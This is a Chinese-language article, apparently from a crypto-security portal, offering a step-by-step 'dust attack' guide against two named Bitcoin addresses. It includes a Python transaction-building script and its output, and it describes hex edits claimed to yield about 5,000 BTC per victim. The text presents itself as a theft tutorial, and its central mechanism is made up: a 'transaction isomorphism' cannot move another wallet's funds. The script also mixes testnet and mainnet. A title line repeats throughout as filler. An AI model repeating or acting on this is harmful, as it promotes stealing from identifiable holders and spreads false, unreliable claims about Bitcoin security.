DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

在本文中,我們將討論一個廣泛的主題:“灰塵攻擊”,稱為:"Dusting Attack""Crypto Dust"。或許每個加密貨幣用戶或大量BTC、ETH幣的持有者都會在他們的加密貨幣錢包上替換掉微不足道的少量satoshi幣的收據,這個收據被偽裝成"Donate",但實際上它是一個完整的數學精煉系統,用於取得清除資產負債表上錢包中所有累積的硬幣。揭示「灰塵攻擊」系統和所有陷阱的目標是受到2024 年 1 月 8 日發表的一篇文章的啟發和促使的。在全球加密經濟學網站CoinDesk上

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.coindesk.com/markets/2024/01/08/mysterious-12m-bitcoin-transaction-to-satoshi-nakamoto-sparks-speculations/
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
pic.twitter.com/w34kjnAHPJ
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
d7db4f96a4059c8906b953677ce533493d7b9da0f854a21b99f5772910dd0a31
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

雖然每個人都想知道到底是誰將其發送27 BTC到流行的比特幣錢包[Satoshi Nakamoto],但我們將研究兩個不同的灰塵攻擊示例,以便闡明這種操縱的所有複雜性以及流行的加密貨幣比特幣的用戶和持有者可能面臨的風險。


我們看另一篇文章,以TXI D 為例,其中進行了大量的灰塵攻擊。

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://dust-attack.blogspot.com
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
1d6580dcd979951bd600252b741c22a3ea8e605e43168f8452c68915c3ea2bf3

文章稱,這筆交易是利用粉塵攻擊系統進行的 BTC 幣竊盜案中數量最多的一次。


讓我們關心一下【2022年7月-8月】期間成功進行粉塵攻擊的兩個比特幣地址,總金額為:10,000 BTC


範例1

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.blockchain.com/explorer/addresses/btc/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i

例子2

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

要進行粉塵攻擊,礦工對同構的確認起著重要作用,因為 從2022年到2024年,許多加密貨幣服務和硬體錢包都在積極對抗灰塵攻擊。

目前,在自己的冷錢包上獨立創建塵埃交易的方法已經廣泛流行。讓我們以第 1 號為例,進入「建立 Dust 交易」部分

在 Windows 10 上安裝Python 3.12.1

https://youtube.com/watch?v=q1jHMJZwseg%3Fsi%3DbboY9EARIo8JRqcp

連結到 gif 內容 #01


下載原始碼,安裝get-pip.py  並執行install.py安裝軟體包:

https://youtube.com/watch?v=nvdl_BmReTk%3Fsi%3DIXY5_C32pD6D4IKH

連結到 gif 內容 #02


讓我們生成自己的冷錢包

https://youtube.com/watch?v=upsUBJp-WYw%3Fsi%3Di6MceKae_nh7w3t9

連結到 gif 內容 #03


餘額及支付交易

儲值您的冷錢包餘額:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
餘額:0.02786906 BTC 或比特幣單位:2786906 satoshi

讓我們保存餘額補充付款中的交易TXID哈希,以進一步構建Merkle Tree

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
Merkle 樹從下到上填充,其中對每個資料塊套用哈希,並將結果值寫入樹的葉子。更高層級的區塊由兩個子區塊的雜湊值總和填滿。重複這個過程,直到獲得最高值或 Merkle Root。Bitcon區塊鏈使用SHA256雜湊函數。其他區塊鏈可能使用不同的加密原理來創建梅克爾樹。

餘額補充的支付哈希值

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://btc1.trezor.io/tx/0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5

讓我們複製TXID:0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5因為 這是補充冷錢包餘額的雜湊值:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK ,然後開啟Python腳本createrawtransaction.py的源代碼,並在第7行將值更改為您的資料。

dust_tx = bytes.fromhex("0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5")

為了保護您新建立的冷錢包:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK
,我們始終關閉您電腦上的網路。這對於您 PC 上執行的第三方應用程式洩漏私鑰的安全性是必要的。此過程將需要幾分鐘。建立灰塵交易 RawTX 時停用網際網路。

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

一旦您確定第 5 行中的互聯網已停用,請插入私鑰 WIF

pk = PrivateKey.parse("L1k********************************************MdrTj")

在第 12 行中,新增冷錢包餘額的總額。在我們的例子中,這個金額是2786906 satoshi

tx_in._value = 2786906

從灰塵攻擊中獲利。

我們選擇一個比特幣錢包,如果礦工確認同構,我們最終會從中獲利。由於我們正在考慮範例 1,因此在本例中我們選擇比特幣錢包位址:14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.blockchain.com/explorer/addresses/btc/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i

在第 9 行中,我們需要指出灰塵攻擊的比特幣地址

send_dust = "14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i"

灰塵量將為555 satoshi,在第 15 行我們指出了這個數量。

    TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),

接下來,我們考慮費用(礦工佣金),該金額將為226 聰

555 + 226 = 781 satoshi

我們還需要考慮將資金退回到冷錢包:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK,因為 我們為灰塵攻擊分配了781 satoshi ,從冷錢包餘額的總補充金額2786906 satoshi中減去此金額

2786906 - 781 = 2786125 satoshi 

在第 16 行中,我們指出了退回冷錢包的資金金額:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK

    TxOut(2786125, Tx.get_address_data(pk.address())['script_pubkey'].serialize())

我們透過按某個鍵或選項來執行createrawtransaction.py腳本«F5» : Run / Run Module F5

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

運行腳本:createrawtransaction.py

from io import BytesIO
from secp256k1 import *
from sighash import *

pk = PrivateKey.parse("L1k********************************************MdrTj")
pk.address()
dust_tx = bytes.fromhex("0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5")
dust_index = 0
send_dust = "14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i"
tx_in = TxIn(dust_tx, dust_index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 2786906
tx_ins = [ tx_in ]
tx_outs = [
    TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),
    TxOut(2786125, Tx.get_address_data(pk.address())['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()

print("\n--------------------------------------\n")
print("My work Bitcoin Address:  " + pk.address())
print("Address for Getting Rich: " + send_dust)
print("\n--------------------------------------\n")
print(tx_in._script_pubkey)
print(tx_in.script_sig)
print("\n--------------------------------------\n")
print("RawTX for performing isomorphism:")
print(tx.serialize().hex())
print("\n--------------------------------------\n")

結果:

--------------------------------------

My work Bitcoin Address:  1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK
Address for Getting Rich: 14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i

--------------------------------------

OP_DUP OP_HASH160 b'2581997c24562e316ffa3163e63d2db26442cc9a' OP_EQUALVERIFY OP_CHECKSIG 
b'304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916' b'02fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5a' 

--------------------------------------

RawTX for performing isomorphism:
0200000001c593d1502ece362f78bcdabe8e250cb2e9cfcad5149a3dde781f33d42d3c250b010000006a47304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff022b020000000000001976a9142581997c24562e316ffa3163e63d2db26442cc9a88ac4d832a00000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688acd9530800

--------------------------------------
https://youtube.com/watch?v=qhNU-7g4sAU%3Fsi%3DZoZrij7Tw7tiNsRP

連結到 gif 內容 #04.1


我們已經收到了RawTX灰塵交易,現在讓我們進入 驗證交易部分以確保交易已正確建立。複製RawTX並將其貼上到驗證交易和其他腳本輸入欄位中

用於執行同構的RawTX:

0200000001c593d1502ece362f78bcdabe8e250cb2e9cfcad5149a3dde781f33d42d3c250b010000006a47304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff022b020000000000001976a9142581997c24562e316ffa3163e63d2db26442cc9a88ac4d832a00000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688acd9530800
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

ScriptSig 同構

我們的灰塵攻擊的目標是從我們發送555 satoshi 的比特幣錢包中獲取最大利潤。為此,我們進入ScriptSig 同構部分,根據https://safecurves.cr.yp.to/ladder.html的理論,將粉塵交易轉換為同構(兩筆交易必須經過礦工確認)。第一筆交易是灰塵交易,其中發送了少量的555 聰,第二筆交易是第一筆交易的同構,其中發生了從灰塵攻擊受害者的餘額中反向轉移資金的情況。

https://youtube.com/watch?v=hmYmUA2oMwA%3Fsi%3D6CrhwZi5_AXvo9Ek

連結到 gif 內容 #05.1


我們將在CryptoDeepTools儲存庫中發布所得的同構

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i/isomorphism.txt

根據創建灰塵交易部分描述的理論 ,我們需要將74786964新同構交易中的所有現有值更改為txid 比特幣錢包中當前所做的所有值:14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i,我們對其進行少量灰塵攻擊共555 條[ send_dust ]


讓我們透過指定 print(tx.serialize().hex()[+10:+74]) 來執行腳本,並將整個 txid 清單轉換為雜湊流格式

https://youtube.com/watch?v=8FeCuytdDm0%3Fsi%3DFwcwpn_ng0IqaxXF

連結到 gif 內容 #06


收到所有串流雜湊格式後,我們需要透過取代txid來儲存整個列表,為此,請在Notepad++中開啟檔案: isomorphism.txt,按按鍵:write: 74786964替換為:\ntxid\n
CTRL + F

讓我們進入CryptoDeepTools並在Notepad++ 中執行替換功能,因為 我們已經收到了txid列表,現在我們將從列表中GitHub複製整個流式哈希格式列表並將其貼上到文件中:isomorphism.txt


https://youtube.com/watch?v=CVyy3L4p-jY%3Fsi%3DtYc43pnwGzU3ZNKh

連結到 gif 內容 #08


取代檔案中的公鑰:isomorphism.txt

同構是一個新的交易,我們需要指示我們想要進行交易以獲得最大利潤的比特幣錢包的公鑰來代替價值7075626b6579 。為此,請前往PublicKey.txt檔案 並執行 python 腳本:pubtoaddr.py以確保公鑰是否對應於灰塵攻擊的位址。

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i/PublicKey.txt

然後我們需要將所有現有值7075626b6579 更改為檔案中的值:PublicKey.txt(所有操作也都在Notepad++中完成) 


https://youtube.com/watch?v=_dwT4Y4lRKM%3Fsi%3DYu7tzFFILX6OmZp_

連結到 gif 內容 #10


接收所有利潤的比特幣地址:

為了轉移所有累積的比特幣,我們需要產生一個全新的比特幣地址,格式如下(SegWit):

36ZfWyL5NGvC2u54QENyUgDzTgNyHe1xpE

為了取得hash160比特幣位址,我們需要RedeemScript使用 python 腳本createrawtransaction.py進行解碼

print(Tx.get_address_data(send_dust)['script_pubkey'])

收到hash160新的比特幣地址後,(SegWit)我們需要Notepad++中開啟檔案 isomorphism.txt 並將其中的值替換為收到的值 68617368313630hash160

我們已經新增了創建新交易所需的所有必要值,以便從同構中獲利,現在我們需要透過按鍵選擇檔案 isomorphism.txt 上的所有文字:將 所有CTRL + A內容合併為一行後,我們需要按鍵,CTRL + J結果我們得到一條有空格的長線。我們透過按鍵來刪除空格:CTRL + F替換空格。結果,我們得到一個新的RawTX來完成交易。


https://youtube.com/watch?v=NdDowxhQvsg%3Fsi%3Du_ccUDlNzDto_oOt

連結到 gif 內容 #12


任何交易都必須經過礦工確認才能將RawTX發送到「廣播交易」部分欄位要提交礦工確認申請,您必須仔細確保付款創建正確;為此,請轉到「驗證交易」部分並其他腳本


DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://coinbin.ru/#verify

灰塵襲擊帶來的硬幣利潤為:

5000.00141092 BTC // $209364,284.08 美元


DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.coinbase.com/converter/btc/usd

例子2

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

讓我們用另一個例子繼續灰塵攻擊。我們將使用與冷錢包相同的地址:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK例如2號,我們將充值餘額:0.033532 BTC或比特幣單位:33532 satoshi

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

讓我們保存餘額補充付款中的交易TXID哈希,以進一步構建Merkle Tree


餘額補充的支付哈希值

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://btc1.trezor.io/tx/655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5

讓我們複製TXID:655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5因為 這是補充冷錢包餘額的雜湊值:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK ,然後開啟Python腳本createrawtransaction.py的源代碼,並在第7行將值更改為您的資料。

dust_tx = bytes.fromhex("655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5")

更改第 5 行並插入私鑰 WIF

pk = PrivateKey.parse("L1k********************************************MdrTj")

在第 12 行中,新增冷錢包餘額的總額。在我們的例子中,這個金額是33532 satoshi

tx_in._value = 33532

從灰塵攻擊中獲利。

我們選擇一個比特幣錢包,如果礦工確認同構,我們最終會從中獲利。由於我們正在考慮範例 2,因此在本例中我們選擇比特幣錢包位址:15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

在第 9 行中,我們需要指出灰塵攻擊的比特幣地址

send_dust = "15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt"

灰塵量將為555 satoshi,在第 15 行我們指出了這個數量。

TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),

接下來,我們考慮費用(礦工佣金),該金額將為226 聰

555 + 226 = 781 satoshi

我們還需要考慮將資金退回到冷錢包:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK,因為 我們為灰塵攻擊分配了781 satoshi,從補充冷錢包餘額33532 satoshi的總量中減去此金額

33532 - 781 = 32751 satoshi 

在第 16 行中,我們指出了退回冷錢包的資金金額:1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK

TxOut(32751, Tx.get_address_data(pk.address())['script_pubkey'].serialize())

我們透過按某個鍵或選項來執行createrawtransaction.py腳本«F5» :Run / Run Module F5

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

運行腳本:createrawtransaction.py

from io import BytesIO
from secp256k1 import *
from sighash import *

pk = PrivateKey.parse("L1k********************************************MdrTj")
pk.address()
dust_tx = bytes.fromhex("655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5")
dust_index = 0
send_dust = "15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt"
tx_in = TxIn(dust_tx, dust_index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 33532
tx_ins = [ tx_in ]
tx_outs = [
    TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),
    TxOut(32751, Tx.get_address_data(pk.address())['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()

print("\n--------------------------------------\n")
print("My work Bitcoin Address:  " + pk.address())
print("Address for Getting Rich: " + send_dust)
print("\n--------------------------------------\n")
print(tx_in._script_pubkey)
print(tx_in.script_sig)
print("\n--------------------------------------\n")
print("RawTX for performing isomorphism:")
print(tx.serialize().hex())
print("\n--------------------------------------\n")

結果:

--------------------------------------

My work Bitcoin Address:  1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK
Address for Getting Rich: 15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

--------------------------------------

OP_DUP OP_HASH160 b'662367a3d78a4b0fcbb3020b3d724981d10934f6' OP_EQUALVERIFY OP_CHECKSIG b'3045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622' b'02fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5a'

--------------------------------------

RawTX for performing isomorphism:
0200000001c51c5e64bc3a599b1cfaed2fa0917999071a17b3703d9dec1c7259f03b535c65010000006b483045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff02ef7f0000000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688ac2b020000000000001976a9143467e56d5193558eacdae84af5c1c72ee158dd6788acd9530800

--------------------------------------
https://youtube.com/watch?v=wTVEjUD8OFQ%3Fsi%3D6iHzf9vKXJ6Nppu9

連結到 gif 內容 #04.2


我們已經收到了RawTX灰塵交易,現在讓我們進入 驗證交易部分以確保交易已正確建立。複製RawTX並將其貼上到驗證交易和其他腳本輸入欄位中

用於執行同構的RawTX:

0200000001c51c5e64bc3a599b1cfaed2fa0917999071a17b3703d9dec1c7259f03b535c65010000006b483045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622012102fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5afdffffff02ef7f0000000000001976a914662367a3d78a4b0fcbb3020b3d724981d10934f688ac2b020000000000001976a9143467e56d5193558eacdae84af5c1c72ee158dd6788acd9530800
DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

ScriptSig 同構

我們的灰塵攻擊的目標是從我們發送555 satoshi 的比特幣錢包中獲取最大利潤。為此,我們進入ScriptSig 同構部分,根據https://safecurves.cr.yp.to/ladder.html的理論,將粉塵交易轉換為同構(兩筆交易必須經過礦工確認)。第一筆交易是灰塵交易,其中發送了少量的555 聰,第二筆交易是第一筆交易的同構,其中發生了從灰塵攻擊受害者的餘額中反向轉移資金的情況。

https://youtube.com/watch?v=6Bzm5eNnVr4%3Fsi%3DnggHXVx0RwOCF8xE

連結到 gif 內容 #05.2


我們將在CryptoDeepTools儲存庫中發布所得的同構

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt/isomorphism.txt

根據創建灰塵交易部分描述的理論,我們需要將74786964新同構交易中的所有現有值更改為txid比特幣錢包中當前所做的所有值:15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt,我們對其進行少量灰塵攻擊共555 條[ send_dust ]


讓我們透過指定 print(tx.serialize().hex()[+10:+74]) 來執行腳本,並將整個 txid 清單轉換為雜湊流格式

https://youtube.com/watch?v=ELoHPHKsORQ%3Fsi%3DmsY0Fhz8-11mOn5J

連結到 gif 內容 #07


收到所有串流雜湊格式後,我們需要透過取代txid來儲存整個列表,為此,請在Notepad++中開啟檔案: isomorphism.txt,按按鍵:write: 74786964替換為:\ntxid\n
CTRL + F

讓我們進入CryptoDeepTools並在Notepad++中執行替換功能,因為 我們已經收到了txid列表,現在我們將從列表中GitHub複製整個流式哈希格式列表並將其貼上到文件中:isomorphism.txt


https://youtube.com/watch?v=9eMSR9pk_to%3Fsi%3DtmuTTIdVdXg-blbU

連結到 gif 內容 #09


取代檔案中的公鑰:isomorphism.txt

同構是一個新的交易,我們需要指示我們想要進行交易以獲得最大利潤的比特幣錢包的公鑰來代替價值7075626b6579 。為此,請前往PublicKey.txt檔案並執行 python 腳本:pubtoaddr.py以確保公鑰是否對應於灰塵攻擊的位址。

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt/PublicKey.txt

之後我們需要將所有現有值7075626b6579更改為檔案中的值:PublicKey.txt(所有操作也是在Notepad++中完成) 


https://youtube.com/watch?v=pWyHKhOY1s0%3Fsi%3DHUqmvP0IGSdnMeKu

連結到 gif 內容 #11


接收所有利潤的比特幣地址:

為了轉移所有累積的比特幣,我們需要產生一個全新的比特幣地址,格式如下(SegWit):

3GsC42MbUrtGU4un6QHbXkyjKVawyvm6ac

為了取得hash160比特幣位址,我們需要RedeemScript使用 python 腳本createrawtransaction.py進行解碼

print(Tx.get_address_data(send_dust)['script_pubkey'])

收到hash160新的比特幣地址後,(SegWit)我們需要Notepad++中開啟檔案 isomorphism.txt 並將其中的值替換為收到的值 68617368313630hash160

我們已經新增了創建新交易所需的所有必要值,以便從同構中獲利,現在我們需要透過按鍵選擇檔案 isomorphism.txt 上的所有文字:將 所有CTRL + A內容合併為一行後,我們需要按鍵,CTRL + J結果我們得到一條有空格的長線。我們透過按鍵來刪除空格:CTRL + F替換空格。結果,我們得到一個新的RawTX來完成交易。


https://youtube.com/watch?v=Uf9jWF-saS0%3Fsi%3DGGpvQ3dG3DNKY3at

連結到 gif 內容 #13


任何交易都必須經過礦工確認才能將RawTX發送到廣播交易部分字段要提交礦工確認申請,您必須仔細確保付款創建正確;為此,請轉到驗證交易部分並其他腳本

DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://coinbin.ru/#verify

灰塵襲擊帶來的硬幣利潤為:

5001.51473912 BTC // $215831966,02 美元


DUST ATTACK同構確認區塊鏈交易總量10,000 BTC
https://www.coinbase.com/converter/btc/usd

參考:


本資料是為 CRYPTO DEEP TECH入口網站創建的 ,旨在確保資料和橢圓曲線加密 secp256k1的財務安全,防止比特幣加密貨幣 中的 弱ECDSA 簽章 。該軟體的創建者不對材料的使用負責。


來源

電報:https://t.me/cryptodeeptech

YouTube:https://www.youtube.com/@cryptodeeptech

影片素材:https://dzen.ru/video/watch/65be9256df804947fbd96fd7

來源:https://cryptodeep.ru/dustattack


DUST ATTACK同構確認區塊鏈交易總量10,000 BTC

 密碼分析

Crypto Deep Tech